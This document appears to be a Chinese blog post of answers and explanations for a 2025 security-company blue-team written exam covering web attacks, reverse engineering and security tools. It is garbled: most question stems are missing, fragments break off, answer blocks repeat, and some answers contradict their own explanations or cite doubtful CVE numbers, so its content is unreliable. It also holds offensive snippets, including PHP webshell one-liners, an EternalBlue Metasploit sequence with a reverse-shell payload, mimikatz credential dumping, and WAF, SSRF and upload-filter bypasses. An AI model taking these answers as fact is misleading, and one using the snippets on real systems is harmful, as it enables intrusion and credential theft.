
🔥 爆款 CSDN 题库 | 超全护网蓝队笔试真题 | 含详细答案解析 🔥
熬夜为大家整理了 奇安信 2025 年护网蓝队初选笔试题 ,(关注我我会持续更新)涵盖 SQL 注入、Web 安全、渗透测试、二进制安全 等核心知识点,并附上 详细答案解析 ,助力大家高效备考!
12.下列关于虚表指针描述正确的是(1.5分)
✅ B. 虚表指针存储的是虚表的首地址
❌ A. 任何类对象都存在虚表指针(仅含虚函数的类有)
❌ C. 虚表指针位于对象内存空间的起始处(由编译器决定)
❌ D. 虚表指针是否存在不影响对象所占内存空间的大小(存在时会增加指针大小)
📌 解析:
虚表指针(vptr)用于实现多态,指向类的虚函数表首地址。只有包含虚函数的类对象才会存在虚表指针,其位置由编译器决定(通常位于对象内存起始处,但不绝对),且会增加对象内存占用。
✅ C. 在my.cnf 或my.ini 文件中,[mysqld]后添加 log-error= 并配置日志文件
❌ A. log-update=(已弃用,属于旧版更新日志)
❌ B. log-bin=(二进制日志,用于主从复制,非安全审计核心)
❌ D. #log=(通用查询日志,非基线强制要求)
📌 解析:
MySQL基线检查需确保错误日志(log-error)开启,记录数据库运行中的错误和警告,是安全事件追溯的关键。其他日志类型(如二进制日志、查询日志)根据需求选择性配置。
✅ A. allow_url_include = On
❌ B. allow_url_fopen = On(仅控制远程文件读取,非包含执行)
❌ C/D. allow_url_include = Off(禁用则无法触发RFI)
📌 解析:
远程文件包含(RFI)需同时满足:allow_url_fopen=On(允许读取远程文件)和 allow_url_include=On(允许包含远程文件作为代码执行)。
✅ B. 1.8.2后台getshell
✅ C. 低权限后台getshell
❌ A. 0.8后台任意文件删除(版本不匹配,实际漏洞需验证)
❌ D. 0.7 SQL注入漏洞(需具体CVE编号佐证)
📌 解析:
微擎CMS历史漏洞包括后台getshell(如1.8.2版本权限校验不严)、低权限用户通过接口上传恶意文件等。其他选项需结合具体漏洞公告验证。
✅ A. 部署WAF等安全设备
✅ B. 增加过滤(如特殊字符转义)
✅ C. 使用参数化语句(预编译)
❌ D. 动态拼接SQL(导致注入风险)
📌 解析:
防御SQL注入的核心是“输入不可信”,需通过预编译(参数化查询)、过滤/白名单校验、最小权限数据库账户、WAF拦截等多层防护。
✅ A. 注释符(如--、#)
✅ C. 内联注释(如/ !UNION /)
✅ D. 替换关键字(如UNI/**/ON)
❌ B. 无法绕过(实际存在多种绕过手段)
📌 解析:
WAF绕过技术包括:注释混淆、字符编码(如十六进制)、多语句拆分、内联注释利用数据库特性、等价函数替换(如substring→mid)等。
✅ A. cat
✅ B. less
✅ C. head
✅ D. more
📌 解析:
cat:直接输出全部内容
less/more:分页浏览
head:显示文件开头部分
其他类似命令:tail(显示末尾)、nl(带行号输出)。
✅ A. 限制端口(如仅允许80/443)
✅ C. 过滤返回信息(避免敏感数据泄露)
✅ D. 限制IP(禁止内网IP请求)
❌ B. 过滤POST参数(SSRF通常通过URL参数触发)
📌 解析:
SSRF(服务端请求伪造)防御需:禁用非常用协议(如file://、gopher://)、限制请求目标为白名单域名/IP、禁用重定向、校验响应内容类型等
✅ A. XSS
✅ B. SQL注入
✅ C. cookie欺骗
📌 解析 :
XSS(跨站脚本攻击) :通过注入恶意脚本劫持用户会话或窃取信息。
SQL注入 :通过构造恶意SQL语句操纵数据库,获取敏感数据或执行系统命令。
Cookie欺骗 :伪造或篡改Cookie内容,绕过身份验证或提升权限。
其他常见Web攻击:CSRF、SSRF、文件上传漏洞、命令注入等。
✅ A. HTTP
✅ C. HTTPS
✅ D. Socket
❌ B. Pcap(Goby不支持Pcap协议代理扫描)
❌ D. SSH登录暴力破解(属于爆破功能,非代理扫描)
📌 解析 :
Goby的代理扫描支持HTTP/HTTPS/Socket协议,用于绕过防火墙或匿名扫描。SSH暴力破解是独立功能,需通过插件或自定义脚本实现。
✅ A.
java.lang.Runtime
✅ D.
java.lang.ProcessBuilder
❌ B.
java.lang.UNIXProcess/ProcessImpl
(具体实现类,开发者不直接调用)
❌ C.
java.lang.Process
(抽象接口,需通过Runtime或ProcessBuilder实例化)
📌 解析 :
Runtime.exec() :直接执行命令,返回Process对象。
ProcessBuilder :更灵活的命令执行方式,支持重定向输入输出和环境变量配置。
⚠️ 注意:直接执行系统命令可能导致代码注入漏洞(如参数未过滤)。
✅ B. 实战中可通过爆破,根据返回包长度判断开放端口
✅ C. 通过错误信息探测内网状态
✅ D. 访问
/uddiexplorer/SearchPublicRegistries.jsp
可判断漏洞存在
❌ A. 影响版本应为:10.0.2.0、10.3.6.0、12.1.2.0(原选项版本描述不准确)
📌 解析 :
operator=
)触发SSRF,探测内网服务。404
/
503
)可推断端口开放状态。uddiexplorer
组件。✅ A. NTP 123/udp(NTP反射攻击)
✅ C. memcache 11211/udp(Memcached放大攻击)
❌ B. DNS 53/tcp(DNS反射通常用UDP协议)
❌ D. HTTPS 443/tcp(TCP协议无法有效放大流量)
📌 解析 :
反射放大攻击依赖UDP协议和无认证响应机制:
NTP
:
monlist
命令可放大200倍流量。
Memcached :单请求可触发数万倍响应数据。
其他高危协议:SSDP(1900/udp)、CharGen(19/udp)。
✅ B.
C:\Windows\win.ini
是保存系统配置的重要文件
✅ C. hosts文件优先级高于DNS解析
❌ A.
C:\Windows\System32
存放系统核心文件(用户配置文件在
C:\Users
)
❌ D.
C:\ProgramData
存放程序共享数据(病毒常锁定用户目录如
AppData
)
📌 解析 :
C:\Windows\System32\drivers\etc\hosts
,优先于DNS解析。✅ A. 从陌生网站下载软件
✅ B. 下载陌生邮件附件
✅ C. 关闭系统更新功能(无法修复漏洞)
✅ D. 随意插入U盘(自动运行恶意脚本)
📌 解析 :
病毒传播途径:
autorun.inf
自动执行。✅ B.
%n
将已输出字节数写入指定地址
✅ C.
%4$x
直接访问第四个参数(简化利用)
✅ E.
%hn
/
%hhn
避免一次性写入过大数值
❌ A. 写0时需构造256溢出(实际写0需通过
%n
计算偏移)
📌 解析 :
printf(user_input)
),通过
%x
泄露内存或
%n
篡改内存。%<N>c%<M>$n
:向第M个参数指向的地址写入N字节。%hhn
写入1字节,
%hn
写入2字节,分阶段覆盖内存(如修改GOT表)✅ A. 延时注入
✅ C. 报错注入
✅ E. 二次注入
❌ B. XXE注入(属于XML实体注入,与SQL无关)
📌 解析 :
延时注入
:通过
sleep()
等函数盲注,根据响应时间推断数据。
报错注入
:利用数据库错误回显(如
floor(rand()*2)
)泄露信息。
二次注入 :首次注入数据被存储,后续流程触发恶意代码。
其他类型:联合查询注入、布尔盲注、堆叠查询(Stacked Query)。
✅ A. 不会修改程序的内存
✅ B. 可通过
GetThreadContext
检测
❌ C. 可以设置无数个(x86架构仅支持4个硬件断点)
❌ D. 不会修改调试寄存器(需占用调试寄存器DR0-DR3)
📌 解析 :
硬件断点通过CPU调试寄存器实现,不修改代码内存(与软件断点
int3
不同),适用于动态跟踪内存访问或执行流。调试工具(如x64dbg)可调用API检测寄存器状态。
✅ C. 从代码层和Web服务器配置两方面防范
✅ A. 限定可包含文件目录(如PHP
open_basedir
)
✅ D. 代码层定义文件白名单(如
include($_GET['file'].'.php')
)
❌ B. 定义目录白名单(需结合文件白名单更安全)
📌 解析 :
include($_GET['file'])
),使用固定后缀或哈希校验。allow_url_include=Off
)。✅ C.
Deserialize
反序列化的内容用户可控
✅ D. .Net SDK ≤4.5(4.5+默认禁用
BinaryFormatter
)
❌ A.
Serialize
内容可控(仅影响数据生成,非漏洞触发)
❌ B. SDK ≥4.5(漏洞在4.5以下版本未修复)
📌 解析 :
BinaryFormatter
因未验证反序列化数据导致RCE(如
ysoserial
生成Payload)。微软建议使用
DataContractSerializer
替代,并设置
SerializationBinder
限制类型。
✅ A. 设置中断在新模块加载事件
✅ D. 对
LoadLibrary
等函数下断点
❌ B/C. 输出表/导入表断点(适用于函数调用,非模块加载)
📌 解析 :
Options → Debugging options → Events → Break on new module
实现。LoadLibraryW
或
LdrLoadDll
下断点,捕获动态加载的DLL路径。✅ A. HTTP请求报文的Host字段
✅ B. Cookie
✅ C. Referer
✅ D. GET参数
📌 解析 :
任何用户可控且拼接至SQL语句的参数均可能触发注入:
X-Forwarded-For
记录日志时未过滤。✅ A. 枚举用户(Intruder模块爆破用户名)
✅ B. 编码解码(Decoder模块Base64/URL/HTML转换)
✅ C. 数据包重放(Repeater模块修改并重发请求)
✅ D. 抓包拦截(Proxy模块拦截HTTPS流量)
📌 解析 :
Burp Suite核心功能:
✅ A. nslookup(DNS查询工具)
✅ B. dig(DNS解析工具)
✅ D. dnsenum(DNS子域名枚举工具)
❌ C. sqlmap(SQL注入自动化工具)
📌 解析 :
✅ A.
/bin/[r-t]
(通配符匹配
/bin/ls
,需环境支持)
✅ B.
echo ./*
(列出当前目录下所有文件)
✅ C.
find . -maxdepth 1
(等效
ls
,但输出格式不同)
❌ D.
/???/Is
(路径正确但
Is
拼写错误,应为
ls
)
📌 解析 :
/bin/[r-t]
:通配符
[r-t]
匹配字母范围,若存在
/bin/ls
则执行。echo ./*
:输出当前目录所有文件名(依赖Shell扩展)。find
命令
:
-maxdepth 1
限制仅搜索当前目录。ls
、
dir
(部分Shell兼容)、
tree -L 1
(树状结构)。✅ D.
<?php $_GET['eval']($_POST['test']); ?>
(动态调用函数,可执行任意代码)
❌ A.
eval($ POST[test])
(语法错误:
$ POST
应为
$_POST
)
❌ B.
echo "test"
(无恶意行为)
❌ C.
<script>alert(1)</script>
(XSS脚本,非PHP木马)
📌 解析 :
$_GET['eval']
获取函数名(如
assert
),执行
$_POST['test']
中的代码。<?php @eval($_POST['cmd']); ?>
,隐蔽性强且支持加密传输。✅ A. r(读取)
✅ B. w(写入)
✅ C. x(执行)
❌ D. s(特殊权限,如SUID/SGID)
📌 解析 :
r
:查看文件内容或列目录。w
:修改文件或删除目录内文件。x
:执行程序或进入目录。s
:SUID(用户继承文件所有者权限)、SGID(目录继承组权限)。t
:粘滞位(限制目录文件删除权限)。✅ A.
%00截断
(利用空字节终止字符串,如
file.php%00.jpg
)
✅ B.
变换文件后缀名大小写
(如
.PhP
绕过黑名单)
✅ C.
黑名单不全绕过
(如未过滤
.phtml
、
.phar
)
✅ D.
利用Windows系统特性绕过
(如
file.php:.jpg
流文件)
📌 解析 :
file.php.jpg
(部分解析漏洞)。image/jpeg
)。GIF89a
)。java.io.ObjectInputStream 类的()方法检测类名合法性?(1.5分)✅ A.
resolveClass
(反序列化时校验类名)
❌ B.
resolveProxyClass
(处理动态代理类,无关校验)
❌ C.
writeObject
(序列化方法)
❌ D.
ReadObject
(反序列化入口,需结合
resolveClass
)
📌 解析 :
resolveClass
,限制可反序列化的类(如白名单校验)。SerializationFilter
(Java 9+)或第三方库(如Apache Commons IO)。✅ B. 低权限后台getshell
✅ D. 1.8.2后台getshell
❌ A. 0.8后台任意文件删除(需具体漏洞公告验证)
❌ C. 0.7 SQL注入漏洞(未广泛证实)
📌 解析 :
微警CMS(微擎CMS)历史漏洞主要集中在后台权限管理缺陷:
低权限后台getshell :低权限用户通过接口上传恶意文件或利用逻辑漏洞获取服务器权限。
1.8.2版本后台getshell :管理后台存在未授权访问或文件上传校验不严,导致攻击者植入Webshell。
其他选项需结合CVE编号验证,部分版本漏洞存在争议。
✅ C. CC攻击需要借助代理进行
✅ D. CC攻击难以获取目标机器的控制权
❌ A. CC攻击最早在国外大面积流行(起源于国内“挑战黑洞”攻击)
❌ B. CC攻击利用TCP协议缺陷(基于应用层HTTP请求耗尽资源)
📌 解析 :
✅ A. 浮点型(FLOAT、DOUBLE、DECIMAL)
✅ B. 字符串(CHAR、VARCHAR、TEXT)
✅ C. 整型(INTEGER、INT、BIGINT)
✅ D. 日期/时间(DATETIME、DATE、TIMESTAMP)
📌 解析 :
MySQL数据类型分类:
INT
、
FLOAT
、
DECIMAL
(精确小数)。CHAR
(定长)、
VARCHAR
(变长)、
BLOB
/
TEXT
(大文本)。DATE
(年月日)、
TIME
(时分秒)、
TIMESTAMP
(时间戳)。ENUM
(枚举)、
JSON
(结构化数据)。✅
C.
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt
❌ A.
-pwd
参数需指定具体密码(非文件路径)
❌ B.
-userf
仅指定用户名字典
❌ D. 缺少密码参数,语法错误
📌 解析 :
fscan常用参数:
-pwdf
:指定密码字典文件路径(每行一个密码)。
-userf
:指定用户名字典文件路径。
示例:
fscan -h 10.0.0.1/24 -userf users.txt -pwdf passwords.txt
。
✅
B.
Directory
(目录权限配置)
✅
D.
DocumentRoot
(主目录路径)
❌ A.
sshd_config
(SSH服务配置文件)
❌ C.
logs
(日志目录,非核心配置)
📌 解析 :
Apache配置示例(
httpd.conf
或站点配置文件):
apache复制
DocumentRoot "/var/www/html"
<Directory "/var/www/html">
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
✅ A. 本地安全策略设置分为账户策略、本地策略等5部分
✅ B. 成员服务器的本地策略被域策略覆盖
✅ C. 安全设置通过本地安全策略控制台管理
❌ D. 描述不完整(需结合组策略管理)
📌 解析 :
secpol.msc
,管理密码复杂度、审计策略、用户权限分配等。✅ A. jadmin/jonas
✅ C. jonas/jonas
❌ B. admin/123456(常见弱口令,非默认)
❌ D. tomcat/tomcat(Tomcat默认凭证)
📌 解析 :
JOnAS(Java Open Application Server)默认凭证:
jadmin/jonas :管理员账户。
jonas/jonas :普通用户账户。
建议安装后立即修改默认密码。
✅ B. memcache 11211/udp
✅ C. NTP 123/udp
❌ A. DNS 53/tcp(UDP协议更常用于反射)
❌ D. HTTPS 443/tcp(TCP协议无法放大流量)
📌 解析 :
Memcached :无认证UDP服务,单请求可触发数万倍响应(CVE-2018-11321)。
NTP
:
monlist
命令响应包放大效果显著。
其他高危协议:SSDP(1900/udp)、SNMP(161/udp)。
✅ A. 自动(推荐)
✅ B. 下载更新,由用户决定何时安装
✅ C. 仅通知可用更新
✅ D. 关闭自动更新
📌 解析 :
Windows更新选项(截至2025年):
✅
A. 文件名(如
test.asp;.jpg
)
✅
D. 文件夹(如
/upload/test.asp/1.jpg
)
❌ B. 默认类型名(IIS6无此机制)
❌ C. 默认扩展名(与漏洞无关)
📌 解析 :
分号截断
:
test.asp;.jpg
被解析为ASP文件。
目录解析
:
/asp目录/1.jpg
被当作ASP执行。
修复建议:禁用非必要脚本映射,升级至IIS7+。
✅ A. 8.5版
✅ B. 8.5.5传统和自由
✅ C. 8.0版
✅ D. 7.0版
📌 解析 :
CVE-2015-7450 :影响WebSphere Application Server 7.0、8.0、8.5及Liberty Profile。
✅
C. JBoss4.x访问
/jbossmq-httpil/HTTPServerILServlet
存在漏洞
✅
D. JBoss5.x/6.x访问
/invoker/readonly
返回500可能存在漏洞
❌ A. JMX Invoker漏洞需关闭
jmx-invoker-service.xml
❌ B. WLS Security漏洞属于WebLogic(非JBoss)
📌 解析 :
4.x版本
:
/jbossmq-httpil/HTTPServerILServlet
未授权访问,可执行任意代码。
5.x/6.x版本
:
/invoker/readonly
接口反序列化漏洞(CVE-2017-12149)。
修复建议:删除或限制访问高危接口,升级至EAP 7+。
✅ A. 限制IP(禁止内网IP请求)
✅ B. 限制端口(仅允许80/443)
✅ C. 过滤返回信息(避免敏感数据泄露)
❌ D. 过滤POST参数(SSRF通常通过URL触发)
📌 解析 :
SSRF防御策略 :
✅ A. 高稳定性环境需综合评估修复优先级
✅ B. 修复可能影响业务连续性
❌ C. 极高危漏洞必须修复(不可忽略)
❌ D. Linux无需频繁升级(仍需定期更新)
📌 解析 :
漏洞修复原则:
✅ C. 升级后需生成新密钥(原密钥可能泄露)
✅ D. 升级至最新版本可解决
❌ A. 旧密钥可继续使用(存在被窃取风险)
❌ B. 用户需改密(漏洞泄露内存数据,非密码)
📌 解析 :
Heartbleed(CVE-2014-0160)修复步骤 :
✅
A. 目录解析(
a.asp/
下任意文件解析为ASP)
✅
D. 分号截断(
test.asp;.jpg
)
❌ B. 路径后加
.php
(IIS6不支持PHP解析)
❌ C. 路径前加
/php
(无实际意义)
📌 解析 :
文件夹解析
:
/asp_dir/1.jpg
被当作ASP执行。
分号截断
:
test.asp;.jpg
忽略分号后内容。
修复方案:禁用非必要脚本映射,使用URL重写过滤异常请求
✅
B. 十六进制
(如
0x7F000001
→ 127.0.0.1)
✅
D. 八进制
(如
0177.0.0.1
→ 127.0.0.1)
❌ A. 十进制(需服务端支持转换,较少直接使用)
❌ C. 二进制(实际应用中难以直接拼接)
📌 解析 :
SSRF过滤通常拦截标准IP格式,通过以下方式绕过:
✅ B. 组件可能出现多种漏洞
✅ C. 漏洞可能导致数据泄露
❌ A. 漏洞影响小(如Log4j漏洞影响全球系统)
❌ D. 组件无漏洞(所有软件均可能存漏洞)
📌 解析 :
✅ A. 伪造数字签名
✅ B. 动态获取函数地址(API混淆)
✅ C. 内存/网络加载模块(无文件攻击)
✅ D. 加壳混淆(如UPX、VMProtect)
📌 解析 :
Reflective DLL Injection
规避文件扫描。✅ A. nslookup (基础DNS查询)
✅ D. dig (详细DNS记录解析)
❌ B. sqlmap(SQL注入工具)
❌ C. volatility(内存取证工具)
📌 示例命令 :
bash复制
dig
example.com
MX
# 查询邮件服务器记录
nslookup -type=AAAA
example.com
# 查询IPv6地址
✅ B. 钩子是网络通信程序 (错误,钩子用于消息处理)
✅ C. 钩子是应用程序 (错误,钩子是函数级拦截机制)
❌ A/D正确(钩子处理消息,属于窗口函数机制)
📌 应用场景 :
✅ A. EKP后台SQL注入
✅ B. 前台SSRF到RCE
✅ C. 任意文件上传
✅ C. 前台SQL注入 (选项重复,可能为笔误)
📌 修复建议 :
file://
)。✅
A. IPv6为128位
(如
2001:0db8:85a3::8a2e:0370:7334
)
✅
B. 192.168.8.1属C类私有IP
(范围
192.168.0.0/16
)
✅ C. C类默认掩码255.255.255.0
✅ D. 127.0.0.1为本机地址
📌 扩展知识 :
10.0.0.0/8172.16.0.0/12192.168.0.0/16✅ A. Auxiliary (信息收集、扫描)
✅ B. Payload (攻击载荷,如反向Shell)
✅ C. Exploits (漏洞利用代码)
❌ D. Listen(非独立模块,属于Payload配置)
📌 常用命令 :
bash复制
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
✅ A. system()
✅ C. exec()
✅ D. shell_exec()
❌ B. phpinfo()(信息泄露,不直接执行命令)
📌 防御措施 :
disable_functions=system,exec
)。escapeshellarg()
过滤参数)。✅ A. Oracle
✅ C. MySQL
✅ D. MSSQL
❌ B. MongoDB(NoSQL注入需专用工具如NoSQLMap)
📌 示例命令 :
bash复制
sqlmap -u "
Example Domain
--dbms=mysql
sqlmap -u "
Example Domain
--dbms=oracle
✅ A. 获取账号密码 (从LSASS进程提取)
✅ B. 哈希传递(Pass-the-Hash)
✅ C. 票据传递(Pass-the-Ticket)
❌ D. 代理转发(需配合其他工具如Proxifier)
📌 经典命令 :
bash复制
mimikatz
# privilege::debug
mimikatz
# sekurlsa::logonpasswords
✅ A. pcntl_exec()
✅ C. popen()
✅ D. passthru()
❌ B. phpinfo()(仅信息输出)
📌 风险示例 :
php复制
<?php
passthru($_GET['cmd']);
// 直接执行用户输入命令
?>
❌
B.
select name where math is (select max(math)...)
(语法错误,
is
用于NULL判断)
✅ 其他选项正确(A/C/D均等价,
=
或
in
匹配唯一值)
📌 解析 :
IS
用于比较
NULL
,如
math IS NULL
。WHERE math = (SELECT MAX(math) ...)
。✅ B. 通过获取管理员信任获取密码 (如钓鱼邮件、伪装身份)
✅ D. 通过办公室电话、姓名、生日猜测密码 (利用个人信息构造弱口令)
❌ A. 破解SAM库(技术手段,非社会工程学)
❌ C. 暴力破解工具(自动化攻击,非社会工程学)
补充 :
社会工程学的核心是 利用人性弱点 获取信息,例如:
✅ D. 前台getshell (如文件上传漏洞直接获取Webshell)
✅ B. CSRF修改管理员密码 (跨站请求伪造攻击)
❌ A. SSRF(需具体漏洞验证)
❌ C. 远程文件包含(未广泛披露)
背景 :
FineCMS历史漏洞案例:
/index.php?c=attachment&a=upload
)。✅ B. 企业管理器→安全性→登录中删除账号 (主登录入口)
✅ C. 企业管理器→数据库→用户中删除账号 (数据库级权限)
❌ A. 管理→删除账号(路径不准确)
❌ D. 服务器角色→删除账号(角色管理,非直接删除账号)
操作示例 :
主登录账号:
安全性→登录名→右键删除
。
数据库用户:
数据库→用户→右键删除
。
注意 :需同步清理数据库用户与登录名的映射关系。
✅ A. A8 search_result.jsp SQL注入 (CVE-2018-7314)
✅ D. A8 htmlofficeservlet getshell (CVE-2017-10245)
❌ B. 任意用户密码修改(需结合其他漏洞)
❌ C. setextno.jsp SQL注入(未广泛证实)
漏洞利用 :
.jsp
文件绕过过滤,路径如
/seeyon/htmlofficeservlet
。✅ A. 密码策略复杂度要求 (符合NIST标准)
✅ D. 使用VPN连接 (加密通信,防止中间人攻击)
❌ B. 密码永不过期(违反定期更换原则)
❌ C. 开启Telnet(明文传输,不安全)
扩展建议 :
✅
B. 短文件名漏洞
(泄露文件路径,如
test~1.asp
)
✅
D. 解析漏洞
(如
test.asp;.jpg
被解析为ASP)
❌ A. HTTP.sys 漏洞(CVE-2015-1635,需具体版本)
❌ C. 反序列化漏洞(常见于.NET应用,非IIS自身)
防御措施 :
8.3
文件名格式(
fsutil behavior set disable8dot3 1
)。Handler Mappings
限制可执行文件类型。✅ B. Netstat显示网络信息 (连接、端口、路由表)
✅ C. Ping测试连通性
✅
D. Telnet测试端口开放
(如
telnet 192.168.1.1 80
)
❌ A. Tracert查看IP网卡信息(实际用于追踪路由路径)
常用命令示例 :
bash复制
netstat -ano | findstr "ESTABLISHED"
# 查看活动连接
tracert 8.8.8.8
# 追踪到Google DNS的路由
✅
A. 保持系统补丁更新
(如
yum update
或
apt upgrade
)
✅ C. 最小安装原则 (减少攻击面)
✅
D. 关闭无关服务
(如
systemctl disable telnet
)
❌ B. 全安装增加便利性(违反最小化安全原则)
安全实践 :
/etc/ssh/sshd_config
中
PermitRootLogin no
。iptables
或
firewalld
限制端口访问。✅ C. index jsp.class
✅ D. index jspjava
📝 解析 :
Tomcat的Jasper引擎将JSP编译为Java文件(如
index_jsp.java
)和Class文件(如
index_jsp.class
)。选项C和D命名格式错误(缺少下划线),故不会生成。
✅ D. Thinkphp<6.0.2 session id未过滤导致getshell
📝 解析 :
✅ B. 4625登录失败
📝 解析 :
4624 :登录成功。
4625 :登录失败。
4720 :用户账户创建。
选项B正确,D错误(4624应为成功)。
✅ A. 库加密
✅ B. 列加密
📝 解析 :
库加密 :全库或表空间级加密(如Oracle TDE)。
列加密 :字段级加密(如敏感数据单独加密)。
行加密(D)和表加密(C)属于子类,但题目要求主要分类。
✅ C. SQL注入
📝 解析 :
sprintf
直接拼接用户输入(
argv[1]
)到SQL语句,未过滤单引号,导致注入。
示例攻击:
' OR 1=1 --
可绕过条件查询。
✅ B. 后缀<4时,前缀长度≥9
✅ D. 后缀≥4时,前缀长度1
📝 解析 :
longfilename.txt
→
LONGFI~1.TXT
。✅ A. ipconfig
📝
补充
:
ipconfig /all
显示详细网络配置(IPv6地址、MAC地址等)。
✅ C. 防范数据驱动侵袭
📝 解析 :代理无法阻止恶意文件(如PDF漏洞利用),需依赖终端防护。
✅ C. -l
📝
示例
:
hydra -l admin -P passlist.txt ssh://192.168.1.1
。
✅ B. 对
📝
CVE-2013-4810
与
CVE-2015-7501
反序列化点不同,前者使用
JMXInvokerServlet
,后者为
web-console
接口。
✅ D. XSS
📝
解析
:
escape
转义HTML但未处理
NFKC
规范化可能导致的字符合并(如
%32
→
2
),可能绕过过滤。
✅ D. Redis
📝 解析 :Redis是内存数据库,Nginx、WebLogic、JBoss为Web服务组件。
✅ A. rdi
📝 调用约定 :
rdirsirdx✅ B. 443
📝 扩展 :HTTP默认80,HTTPS默认443,SSH默认22。
✅ D. 使用shadow密码
📝
原理
:
/etc/shadow
存储加密密码哈希,仅root可读,防止暴力破解。
✅ B. 存储型XSS
📝 解析 :
escape($link, $POST['message'])
可能仅转义SQL特殊字符(如单引号),但未过滤HTML敏感字符(如
<script>
)。<script>alert(1)</script>
,内容存入数据库后,其他用户查看留言时触发脚本执行。✅ D. 返回“Admin”第一个字符的ASCII码值
📝 拆解 :
SUBSTR('Admin', 1, 1)
:截取第1个字符(
A
)。ASCII('A')
→ 65。✅ C. 不能进行端口扫描
📝 背景 :
✅ C. ~/.bash_history
📝 路径说明 :
/home/user/.bash_history
)。✅ D. 8834
📝 配置验证 :
✅ D. -O
📝 命令示例 :
bash复制
nmap -O 192.168.1.1
# 启用OS指纹识别
✅ D. 如果开放PUT方法,可直接PUT文件并利用MOVE方法获取Webshell
📝 解析 :
test.txt
),再通过
MOVE
方法重命名为可执行脚本(如
test.asp
)。✅ D. 前三位属主,中间三位同组用户,后三位其他用户
📝 权限结构 :
-rwxrwxrwx
:前三位为文件所有者权限,中间三位为同组用户,后三位为其他用户。✅ F. scott/tiger
📝 经典账户 :Oracle早期版本默认测试账户(需手动解锁)。
✅ A. 3389
📝 应用场景 :Windows远程桌面协议默认端口。
✅ B. SQL注入
📝 功能 :自动化检测和利用SQL注入漏洞。
✅ B. File
📝
权限说明
:允许用户使用
LOAD_FILE()
读取文件。
✅ D. 内容过滤
📝 对比 :需解析邮件正文、附件,计算复杂度高。
✅ A. ECX
📝
x86调用约定
:通过
ECX
寄存器传递
this
指针。
✅ D. 取version字符串左边第1个字符
📝
示例
:
version()
返回
5.7.40-log
→ 结果为
5
。
✅ B. OGNL循环解析
📝 漏洞细节 :Struts2框架中OGNL表达式递归解析导致RCE。
✅ C. 优化操作系统
📝 核心功能 :监控识别、病毒查杀、数据恢复。
✅ D. Ping of Death
📝 原理 :发送超大数据包导致系统崩溃(现代系统已修复)。
✅ A. 随机User-Agent标头
📝 绕过防御 :避免被WAF识别。
✅ C. 6379
📝
配置验证
:
redis.conf
中默认端口。
✅ C. 直接测试
📝 主要路线 :黑盒测试、白盒测试、渗透测试。
✅ D. OneForAll
📝 解析 :整合证书透明度、搜索引擎、字典爆破等方式。
✅
A.
show variables like "validate%";
✅
C.
select * from mysql.user where length(password) = 0 or password is null;
✅
D.
select user,password from mysql.user;
✅ A. 屏蔽139、445端口
✅ B. 开启防火墙
✅ D. 加强账户策略
✅
A.
--max-rate
✅
D.
--min-rate
✅ A. AntSword
✅ B. 中国菜刀
✅ C. Godzilla
✅ D. OneForAll
📝 解析 :
✅
A.
show variables like "validate%";
✅
C.
select * from mysql.user where length(password) = 0 or password is null;
✅
D.
select user,password from mysql.user;
📝 解析 :
validate_password
插件状态)。password
为
authentication_string
)。✅ A. 屏蔽139、445端口
✅ B. 开启防火墙
✅ D. 加强账户策略
📝 作用 :
netsh advfirewall firewall add rule
)。✅
A.
--max-rate
✅
D.
--min-rate
📝 示例 :
nmap -T4 --max-rate 1000 192.168.1.1
:限制每秒最多1000个包。✅ A. AntSword
✅ B. 中国菜刀
✅ C. Godzilla
📝 支持协议 :
eval
执行),上述工具均支持传统无加密Webshell管理。✅
A.
extractvalue()
✅
C.
linestring()
📝 原理 :
extractvalue()
:通过XPath语法错误触发报错(如
extractvalue(1,concat(0x7e,version()))
)。linestring()
:地理函数错误拼接导致报错(需MySQL 5.7+)。✅
B.
select deptno, avg(sal) a from emp group by deptno having a > 2000;
📝 语法规则 :
GROUP BY
后必须用
HAVING
过滤聚合函数结果,而非
WHERE
。✅ A. IIS
📝 经典漏洞 :
test.asp;.jpg
)、文件夹解析(
/test.asp/test.jpg
)。✅ B. 进程推进顺序不当
✅ C. 资源分配不当
📝 场景 :
✅ B. Tomcat 7.x <7.0.100
✅ C. Tomcat 8.x <8.5.51
✅ D. Tomcat 9.x <9.0.31
📝
CVE-2020-1938
:通过AJP协议读取/包含任意文件(如
WEB-INF/web.xml
)。
✅ A. 12.2.1.2
✅ B. 12.1.3.0
✅ C. 10.3.6.0
📝 CVE-2018-2628 :利用T3协议反序列化执行命令,影响10.3.6.0、12.1.3.0、12.2.1.2等版本。
✅ A. 关闭扩展存储过程
✅ B. 编写安全代码(参数化查询)
✅ C. 关闭详细错误提示
📝 最佳实践 :
PreparedStatement
)。display_errors = off
)。✅ A. 后缀名限制不严
✅ D. 文件权限未限制
📝 案例 :
.php
文件,且未限制上传目录执行权限,导致Webshell直接执行。✅ A. 库外加密
✅ B. 库内加密
✅ C. 硬件加密
✅ D. 专用加密中间件
📝 技术对比 :
AES_ENCRYPT()
函数。✅ D. 如果开放PUT方法,可直接PUT文件并利用MOVE方法获取Webshell
📝 解析:
PUT方法:若IIS允许WebDAV的PUT请求,攻击者可上传文件(如test.txt ),再通过MOVE方法重命名为可执行脚本(如test.asp )。
其他选项:
A:.php后缀解析漏洞需配合Fast-CGI配置,但路径规则不明确。
C:分号截断适用于IIS6.0(如test.asp;.jpg ),IIS7.x中不适用。
✅ D. 前三位属主,中间三位同组用户,后三位其他用户
📝 权限结构:
-rwxrwxrwx:
前三位:文件所有者权限(读/写/执行)。
中间三位:同组用户权限。
后三位:其他用户权限。
题目中nwx可能为排版错误,实际应为rwx。
✅ F. scott/tiger
📝 经典账户:
scott/tiger:Oracle早期版本默认测试账户(部分版本需手动解锁)。
sys/system:管理员账户,需自定义密码。
✅ A. 3389
📝 应用场景:
Windows远程桌面协议(RDP)默认端口为3389,常用于远程管理服务器。
✅ B. SQL注入
📝 功能:
SQLMap自动化检测和利用SQL注入漏洞,支持多种数据库(MySQL、Oracle等)。
✅ B. File
📝 权限说明:
File权限:允许用户使用LOAD_FILE()读取文件或INTO OUTFILE写入文件。
示例:GRANT FILE ON . TO 'user'@'%';
✅ D. 内容过滤
📝 对比:
内容过滤:需解析邮件正文、附件,使用关键词匹配或机器学习模型,计算复杂度高。
其他机制:黑名单(简单查询)、SMTP认证(握手验证)资源消耗较低。
✅ A. ECX
📝 x86调用约定:
